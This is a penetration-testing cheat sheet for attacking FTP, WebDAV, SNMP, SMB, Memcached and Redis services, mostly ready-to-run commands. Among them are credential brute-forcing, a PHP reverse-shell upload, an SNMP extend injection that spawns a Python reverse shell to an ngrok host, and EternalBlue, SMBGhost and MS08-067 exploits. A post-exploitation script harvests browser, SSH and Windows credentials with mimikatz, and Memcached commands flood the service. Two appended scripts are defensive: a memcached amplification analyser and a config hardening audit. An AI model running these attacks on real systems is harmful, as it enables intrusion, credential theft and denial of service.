Network Configuration
Check List
Cheat Sheet
FTP
Methodology
Run the first Nmap command against $TARGET to grab the FTP banner.
If FTP is open, run the next command (the ftp-anon script) to check whether anonymous login is allowed.
Run the ftp-brute command to see whether a username or password can be found by brute force.
Try the ftp:// URL to see whether the anonymous login also works through a browser.
If login succeeds, use the FTP client commands below to explore the service, and continue the attack with the Hydra and Metasploit commands.
nmap -p 21 -sS -sV --mtu 5000 --script banner $WEBSITE
nmap -p 21 -sS -sV --mtu 5000 --script ftp-anon $WEBSITE
nmap -p 21 -sS -sV --mtu 5000 --script ftp-brute $WEBSITE
ftp://anonymous:anonymous@$TARGET
searchsploit $PRODUCT -s $VERSION -w
Misconfiguration & Vulnerabilities
nuclei -tags ftp -u $TARGET:21
wget --ftp-user=anonymous --ftp-password=anonymous ftp://$TARGET:21
ftp
open $TARGET 21
> anonymous
> anonymous
passive
get file.txt
hydra -V \
-L /usr/share/seclists/Usernames/sap-default-usernames.txt \
-P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ftp://$TARGET:21
msfconsole -qx "
use auxiliary/scanner/ftp/ftp_version;
set RHOSTS $WEBSITE;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/ftp/anonymous;
set RHOSTS $WEBSITE;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/ftp/ftp_login;
set RHOSTS $WEBSITE;
set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;
run;
exit"
WebDAV
Methodology
Run the Nmap http-methods and http-webdav-scan scripts against $TARGET to check for WebDAV.
If WebDAV is enabled, run the Metasploit webdav_scanner module to look for vulnerabilities in the service.
Use Hydra to brute-force the service's login with the username and password lists.
After the brute force, check with davtest whether a file can be uploaded. If it can, upload the PHP reverse-shell file to the service with the davtest command and catch the connection with the Netcat listener.
The same upload can be attempted with the PUT method through cadaver, to check whether that method is allowed on the service.
nmap -p 80,443 \
-sS -sV --mtu 5000 \
--script http-methods,http-webdav-scan $WEBSITE
msfconsole -qx "
use auxiliary/scanner/http/webdav_scanner;
set PATH /webdav;
set RHOSTS $WEBSITE;
run;
exit"
hydra -V \
-L /usr/share/seclists/Usernames/sap-default-usernames.txt \
-P /usr/share/seclists/Passwords/darkweb2017-top10000.txt \
$TARGET http-get /webdav/
davtest -url $WEBSITE
davtest -url $WEBSITE \
-uploadfile /usr/share/webshells/php/php-reverse-shell.php \
-uploadloc shell.php
nc -lvnp 1234
cadaver $WEBSITE/webdav
put /usr/share/webshells/php/php-reverse-shell.php
nc -lvnp 1234
SNMP
Methodology
Run the Nmap snmp-info command against $TARGET to discover the SNMP service.
If it is open, check the service for known vulnerabilities with the Nuclei command.
With the snmpwalk command, retrieve information from the service such as the host name, OID data, the list of interfaces, configured IP addresses, the hardware configuration and, depending on the implementation, sometimes more sensitive information.
With onesixtyone and a list of common community strings (for example public, private, manager, ...), find which strings are valid and extract information from each of them with snmpwalk.
The snmpset command writes to and changes an OID on the SNMP service.
If the service is an old version, write a string value with the SNMPv1 command; otherwise run the SNMPv2c command against the service.
Then open a tunnel with the ngrok command, run the command-injection (RCE) command against the target, and continue with the Metasploit modules.
nmap -p 161 -sU -sV --mtu 5000 --script snmp-info $WEBSITE
nmap -p 161 -sU -sV --mtu 5000 --script snmp-brute $WEBSITE
Nuclei
nuclei -tags snmp -u $TARGET:161
snmpwalk -v1 -c public $TARGET
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET
snmpset -v1 -c private $TARGET OID s "unk9vvn"
snmpset -v2c -c private $TARGET sysName.0 s "unk9vvn"
ngrok http 4444 >/dev/null 2>&1 &
NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')
snmpset -m +NET-SNMP-EXTEND-MIB \
-v 2c \
-c SuP3RPrivCom90 $TARGET \
'nsExtendStatus."command10"' = createAndGo \
'nsExtendCommand."command10"' = /usr/bin/python3 \
'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$NGHOST\",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
snmpwalk -v2c -c SuP3RPrivCom90 $TARGET NET-SNMP-EXTEND-MIB::nsExtendObjects
msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enum;
set RHOSTS $WEBSITE;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enum;
set RHOSTS $WEBSITE;
set COMMUNITY private;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enumusers;
set RHOSTS $WEBSITE;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/snmp/snmp_enumshares;
set RHOSTS $WEBSITE;
run;
exit"
SMB
Methodology
Identify SMB on $TARGET with the first Nmap command; if it is open, check the service for vulnerabilities with the Nmap SMB scripts.
Next, run the brute-force and enumeration commands against the protocol to identify it, obtain username and password lists, and enumerate the domains, groups, active services and running processes.
Connect to the service without a password using the smbclient command to list the shares and gather information.
Then connect with rpcclient using an empty username: a null session lets you enumerate users, groups, sessions and settings, and if the server allows it, it exposes user information and shares.
The same steps, and the exploitation, can be carried out with the Metasploit commands below.
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-protocols,smb-os-discovery,smb2-capabilities $WEBSITE
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-vuln-*,smb-double-pulsar-backdoor $WEBSITE
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-brute $WEBSITE
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-users,smb-enum-shares $WEBSITE
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-domains,smb-enum-groups $WEBSITE
nmap -p 139,445 \
-sS -sV --mtu 5000 \
--script smb-enum-services,smb-enum-processes $WEBSITE
Nuclei
nuclei -tags smb -u $TARGET:445
netexec smb $TARGET
enum4linux -a $TARGET
nbtscan -r $TARGET/24
smbclient -N -L //$TARGET
rpcclient -U "" $TARGET
msfconsole -qx "
use auxiliary/scanner/smb/smb_version;
set RHOSTS $TARGET;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/smb/smb_enumusers;
set RHOSTS $TARGET;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/smb/smb_enumshares;
set RHOSTS $TARGET;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/smb/impacket/secretsdump;
set RHOSTS $TARGET;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/smb/smb_login;
set RHOSTS $TARGET;
set SMBUser Administrator;
set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top100.txt;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/smb/smb_ms17_010;
set RHOSTS $TARGET;
run;
exit"
ngrok http 4444 >/dev/null 2>&1 &
NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')
rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
use auxiliary/gather/impersonate_ssl;
set RHOSTS google.com;
run;
exit"
CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)
cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF
msfconsole -qx "
use exploit/windows/smb/ms17_010_eternalblue;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
msfconsole -qx "
use exploit/windows/smb/smb_doublepulsar_rce;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
msfconsole -qx "
use exploit/windows/smb/cve_2020_0796_smbghost;
set PAYLOAD windows/x64/meterpreter/reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
msfconsole -qx "
use exploit/windows/smb/ms08_067_netapi;
set PAYLOAD windows/meterpreter/reverse_hop_http;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
Memcached
Methodology
Use the Nmap command to identify whether the Memcached service exists on the target.
If the service is active, use the Nuclei command to check it for vulnerabilities.
With the Netcat commands, retrieve step by step the protocol version, the stats, the slabs, the items, the key names from a cache dump and the values of individual keys.
Finally, test the service for denial-of-service (DoS) and amplification (DDoS) weaknesses with the commands below.
nmap -p 11211 -sS -sV --mtu 5000 --script memcached-info $WEBSITE
nuclei -tags memcached -u $TARGET:11211
echo "version" | nc -vn -w 1 $TARGET 11211
echo "stats" | nc -vn -w 1 $TARGET 11211
echo "stats slabs" | nc -vn -w 1 $TARGET 11211
echo "stats items" | nc -vn -w 1 $TARGET 11211
echo "stats cachedump 1 10" | nc -vn -w 1 $TARGET 11211
echo "get $ITEM" | nc -vn -w 1 $TARGET 11211
for i in {1..10000}; do echo "set key$i 0 0 1024" | nc $TARGET 11211; done
echo -e "\x00\x00\x00\x00\x00\x01\x00\x00stats\n" | nc -u -q 1 $TARGET 11211
memcstat --servers=$TARGET
memcdump --servers=$TARGET
memccat --servers=$TARGET $ITEM1 $ITEM2 $ITEM3
msfconsole -qx "use auxiliary/gather/memcached_extractor;set RHOSTS $TARGET;run;exit"
msfconsole -qx "use auxiliary/dos/misc/memcached;set RHOSTS $TARGET;run;exit"
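The eight leading bytes in the `nc -u` line above are memcached's UDP frame header, and the amplification that the DDoS check relies on comes from the server answering a few bytes with many large datagrams. The following shell script, added here and not part of the original sheet, decodes that header, reassembles a multi-datagram reply and measures the response-to-request byte ratio on a constructed exchange (the request id 7, the `counter_N` stat names and the two response datagrams are all made up). On the server side the exposure is removed by starting memcached with `-U 0` (UDP off) and binding it to localhost with `-l 127.0.0.1`.

```bash
#!/usr/bin/env bash
# memcached UDP framing: every UDP request and response begins with an 8-byte header
# of four big-endian 16-bit fields: request id | sequence number | total datagrams | reserved.
# The sheet's "\x00\x00\x00\x00\x00\x01\x00\x00stats" is request id 0, datagram 0 of 1.
# Added example, not code from the original sheet; all datagrams below are constructed.

# mc_header ID SEQ TOTAL: write the 8-byte header to stdout.
mc_header() {
  printf "$(printf '\\%03o' $(($1 / 256)) $(($1 % 256)) $(($2 / 256)) $(($2 % 256)) $(($3 / 256)) $(($3 % 256)) 0 0)"
}

# mc_udp_header FILE: print "id=N seq=N total=N" for the datagram stored in FILE.
mc_udp_header() {
  od -An -tu1 -N 8 "$1" | awk 'NF == 8 { printf "id=%d seq=%d total=%d\n", $1*256+$2, $3*256+$4, $5*256+$6 }'
}

# mc_udp_payload FILE: the text after the header, with CRs removed.
mc_udp_payload() { tail -c +9 "$1" | tr -d '\r'; }

# mc_reassemble FILE...: payloads of one reply concatenated in sequence-number order,
# which is what a client (or an IDS reassembling a capture) must do for multi-datagram replies.
mc_reassemble() {
  for f in "$@"; do
    printf '%s %s\n' "$(mc_udp_header "$f" | sed 's/.*seq=\([0-9]*\).*/\1/')" "$f"
  done | sort -n | while read -r _ f; do mc_udp_payload "$f"; done
}

# mc_amplification REQUEST RESPONSE...: total response bytes divided by request bytes (one decimal).
mc_amplification() {
  local req resp
  req=$(wc -c < "$1"); shift
  resp=$(cat "$@" | wc -c)
  awk -v r="$req" -v t="$resp" 'BEGIN { printf "%.1f\n", t / r }'
}

# --- constructed exchange: a 15-byte "stats" request answered by two datagrams ---
# Ten fixed-width STAT lines (53 bytes each) per datagram; the names and values are made up.
stat_lines() { for i in $(seq "$1" "$2"); do printf 'STAT %-40s %05d\r\n' "counter_$i" "$((i * 7))"; done; }
dir=$(mktemp -d)
{ mc_header 7 0 1; printf 'stats\r\n'; } > "$dir/req"
{ mc_header 7 0 2; stat_lines 1 10; }     > "$dir/resp0"
{ mc_header 7 1 2; stat_lines 11 20; }    > "$dir/resp1"

echo "request:  $(mc_udp_header "$dir/req") payload=$(mc_udp_payload "$dir/req")"
echo "reply:    $(mc_udp_header "$dir/resp0") / $(mc_udp_header "$dir/resp1")"
echo "reassembled lines: $(mc_reassemble "$dir/resp1" "$dir/resp0" | wc -l | tr -d ' ')"
echo "amplification factor: $(mc_amplification "$dir/req" "$dir/resp0" "$dir/resp1")x"
```

The same functions work on real datagrams saved from a capture (one file per UDP payload), which is how to confirm whether a host answers the 15-byte `stats` probe with a reply large enough to be abused.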
Redis
Methodology
Identify the service on the target with the first Redis command in the cheat sheet, the Nmap redis-info scan.
If the service is open, use the next command (redis-cli) to check whether it accepts unauthenticated access.
Next, use Hydra to brute-force the password from a wordlist, and then the Nuclei tool to check the service for misconfiguration vulnerabilities.
nmap -p 6379 -sS -sV --mtu 5000 --script redis-info $TARGET
redis-cli -h $TARGET -p 6379
hydra -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt \
-s 6379 $TARGET redis
nuclei -tags redis -u $TARGET:6379
msfconsole -qx "
use auxiliary/scanner/redis/redis_server;
set RHOSTS $TARGET;
run;
exit"
msfconsole -qx "
use auxiliary/gather/redis_extractor;
set RHOSTS $TARGET;
run;
exit"
msfconsole -qx "
use auxiliary/scanner/redis/redis_login;
set RHOSTS $TARGET;
set ANONYMOUS_LOGIN true;
set BLANK_PASSWORDS true;
set STOP_ON_SUCCESS true;
set THREADS 10;
run -j"
Exploitation
msfconsole -qx "
use exploit/linux/redis/redis_replication_cmd_exec;
set PAYLOAD linux/x64/meterpreter_reverse_https;
set RHOSTS $TARGET;
set LHOST $NGHOST;
set LPORT 443;
set ReverseListenerBindAddress 127.0.0.1;
set ReverseListenerBindPort 4444;
set HandlerSSLCert $CERT;
set StagerVerifySSLCert true;
set StageEncoder true;
set AutoRunScript /tmp/post-exp.rc;
run -j"
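Each of the checks in this sheet (anonymous FTP, default and writable SNMP communities, SMB null sessions and guest shares, unauthenticated Redis with MODULE loading) corresponds to a daemon setting that the owner of the host can turn off. The following shell script, added here and not part of the original sheet, audits the four configuration files for those settings and prints one finding per weak line; it serves the FTP, SNMP, SMB and Redis sections together. The option names are the real ones for vsftpd, Net-SNMP's snmpd, Samba and Redis; the sample configs, the `systemonly` view name, the `monitor` SNMPv3 user and every community string and passphrase in them are constructed.

```bash
#!/usr/bin/env bash
# Hardening audit for the services this sheet enumerates: vsftpd (FTP), snmpd (SNMP),
# Samba (SMB) and Redis. Added example, not code from the original sheet.
# Each audit_* function reads one config file and prints one line per weak setting;
# count_findings wraps that, so 0 means nothing was flagged. The sample configs are constructed.

# Effective lines of a config file: comments (# or ;) and blank lines removed.
conf_lines() { sed -e 's/[#;].*$//' -e 's/^[[:space:]]*//' -e '/^$/d' "$1"; }

# conf_get FILE KEY: value of the first "KEY = value" / "KEY=value" line, case-insensitive.
conf_get() {
  conf_lines "$1" | awk -v k="$2" -F= '
    { key = $1; val = $2; gsub(/^[ \t]+|[ \t]+$/, "", key); gsub(/^[ \t]+|[ \t]+$/, "", val)
      if (tolower(key) == tolower(k)) { print val; exit } }'
}

# count_findings AUDIT_FN FILE: number of lines the audit printed.
count_findings() { "$1" "$2" | awk 'END { print NR }'; }

# FTP: what the ftp-anon script and ftp://anonymous:anonymous@ probe for.
audit_vsftpd() {
  local v
  v=$(conf_get "$1" anonymous_enable | tr '[:lower:]' '[:upper:]')
  # upstream vsftpd defaults anonymous_enable to YES, so an unset key is flagged too
  [ "$v" = "YES" ] || [ -z "$v" ] && echo "vsftpd: anonymous_enable=${v:-unset} (anonymous login allowed)"
  v=$(conf_get "$1" anon_upload_enable | tr '[:lower:]' '[:upper:]')
  [ "$v" = "YES" ] && echo "vsftpd: anon_upload_enable=YES (anonymous users may upload)"
  return 0
}

# SNMP: community strings onesixtyone guesses, and the write access snmpset / NET-SNMP-EXTEND-MIB need.
audit_snmpd() {
  conf_lines "$1" | awk '
    tolower($1) ~ /^(ro|rw)community6?$/ {
      if (tolower($1) ~ /^rw/) print "snmpd: " $0 "  (writable community: snmpset and extend changes possible)"
      if ($2 == "public" || $2 == "private") print "snmpd: " $0 "  (default community string)"
      if (NF < 3) print "snmpd: " $0 "  (no source restriction)"
    }
    tolower($1) == "extend" { print "snmpd: " $0 "  (command exposed through NET-SNMP-EXTEND-MIB)" }'
}

# SMB: null sessions (rpcclient -U ""), guest mapping, SMB1 and unsigned traffic.
audit_smb() {
  local v
  v=$(conf_get "$1" "map to guest" | tr '[:upper:]' '[:lower:]')
  [ -n "$v" ] && [ "$v" != "never" ] && echo "smb: map to guest = $v (unknown users mapped to guest)"
  v=$(conf_get "$1" "restrict anonymous")
  [ "${v:-0}" -lt 2 ] && echo "smb: restrict anonymous = ${v:-unset} (null-session enumeration allowed)"
  v=$(conf_get "$1" "server min protocol" | tr '[:lower:]' '[:upper:]')
  case "$v" in ""|CORE|COREPLUS|LANMAN1|LANMAN2|NT1) echo "smb: server min protocol = ${v:-unset} (SMB1 not pinned off)";; esac
  v=$(conf_get "$1" "server signing" | tr '[:upper:]' '[:lower:]')
  case "$v" in mandatory|required) ;; *) echo "smb: server signing = ${v:-unset} (signing not enforced)";; esac
  conf_lines "$1" | awk 'tolower($0) ~ /^guest ok *= *yes/ { print "smb: " $0 "  (share reachable without credentials)" }'
}

# Redis: unauthenticated access, and the MODULE command that redis_replication_cmd_exec relies on.
audit_redis() {
  conf_lines "$1" | awk '
    { key = tolower($1); seen[key] = 1 }
    key == "bind" && $0 ~ /0\.0\.0\.0|(^| )\*( |$)/ { print "redis: " $0 "  (listens on all interfaces)" }
    key == "protected-mode" && tolower($2) == "no" { print "redis: protected-mode no  (remote unauthenticated access allowed)" }
    key == "requirepass" && $2 != "" && $2 != "\"\"" { auth = 1 }
    key == "rename-command" && toupper($2) == "MODULE" && $3 == "\"\"" { nomod = 1 }
    END {
      if (!("bind" in seen)) print "redis: bind unset  (listens on all interfaces)"
      if (!auth) print "redis: requirepass unset  (no authentication)"
      if (!nomod) print "redis: MODULE command enabled  (add: rename-command MODULE \"\")"
    }'
}

# Constructed sample configs, one weak and one hardened per service.
dir=$(mktemp -d)
printf '%s\n' 'anonymous_enable=YES' 'anon_upload_enable=YES' > "$dir/vsftpd-weak.conf"
printf '%s\n' 'anonymous_enable=NO' 'local_enable=YES' > "$dir/vsftpd-hard.conf"
printf '%s\n' 'rocommunity public' 'rwcommunity private' > "$dir/snmpd-weak.conf"
# read-only v2c from one network through a restricted view; the v3 user is created out of band (net-snmp-create-v3-user)
printf '%s\n' 'view systemonly included .1.3.6.1.2.1.1' 'rocommunity Xk9QpRt2vLm7 10.0.0.0/8 -V systemonly' \
  'rouser monitor authpriv -V systemonly' > "$dir/snmpd-hard.conf"
printf '%s\n' '[global]' '  map to guest = Bad User' '  server min protocol = NT1' '[public]' '  guest ok = yes' > "$dir/smb-weak.conf"
printf '%s\n' '[global]' '  map to guest = Never' '  restrict anonymous = 2' '  server min protocol = SMB2_02' \
  '  server signing = mandatory' > "$dir/smb-hard.conf"
printf '%s\n' 'bind 0.0.0.0' 'protected-mode no' > "$dir/redis-weak.conf"
printf '%s\n' 'bind 127.0.0.1 -::1' 'protected-mode yes' 'requirepass Replace-With-A-Long-Random-Passphrase' \
  'rename-command MODULE ""' 'rename-command REPLICAOF ""' > "$dir/redis-hard.conf"

for svc in vsftpd snmpd smb redis; do
  for kind in weak hard; do
    echo "== $svc ($kind): $(count_findings "audit_$svc" "$dir/$svc-$kind.conf") finding(s)"
    "audit_$svc" "$dir/$svc-$kind.conf"
  done
done
```

Point the audit_* functions at the live files (/etc/vsftpd.conf, /etc/snmp/snmpd.conf, /etc/samba/smb.conf, /etc/redis/redis.conf on most distributions) to get the same findings for a real host; the hardened samples double as the settings to apply.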